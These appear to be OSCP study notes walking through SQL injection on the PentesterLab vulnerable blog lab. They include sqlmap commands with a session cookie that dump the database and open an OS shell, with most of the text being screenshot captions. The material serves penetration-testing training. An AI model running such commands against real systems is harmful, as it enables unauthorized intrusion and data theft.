SQL Injection[SQLi]


Refrence: SQL Injection Authentication Bypass Cheat Sheet



1. Browse the PentesterLab vulnerable blog website through Firefox.

OSCP Learning Notes - WebApp Exploitation(3)_Kali Linux


 2.Edit the Cookie value using the tool Cookie Manager, and save it.OSCP Learning Notes - WebApp Exploitation(3)_firefox_02

3. The Click the 'Admin' button, then we can enter the administration page.

OSCP Learning Notes - WebApp Exploitation(3)_php_03

4. Watch the URL type, and we guess the DBMS may be Mysql.

OSCP Learning Notes - WebApp Exploitation(3)_Kali Linux_04

5. Change the id number to " ' ", and press enter. The page shows as the following.

OSCP Learning Notes - WebApp Exploitation(3)_Kali Linux_05


 6.  Use sqlmap for injection operations

sqlmap -u "" --cookie=PHPSESSID=q5sm3kj7suae5uam1gmbh47kr1

OSCP Learning Notes - WebApp Exploitation(3)_OSCP_06

OSCP Learning Notes - WebApp Exploitation(3)_Kali Linux_07

OSCP Learning Notes - WebApp Exploitation(3)_Kali Linux_08

sqlmap -u "" --cookie=PHPSESSID=q5sm3kj7suae5uam1gmbh47kr1 -dump

OSCP Learning Notes - WebApp Exploitation(3)_Kali Linux_09

OSCP Learning Notes - WebApp Exploitation(3)_firefox_10

OSCP Learning Notes - WebApp Exploitation(3)_firefox_11

sqlmap -u "" --cookie=PHPSESSID=q5sm3kj7suae5uam1gmbh47kr1 --os-shell

OSCP Learning Notes - WebApp Exploitation(3)_php_12

OSCP Learning Notes - WebApp Exploitation(3)_sql_13

OSCP Learning Notes - WebApp Exploitation(3)_sql_14


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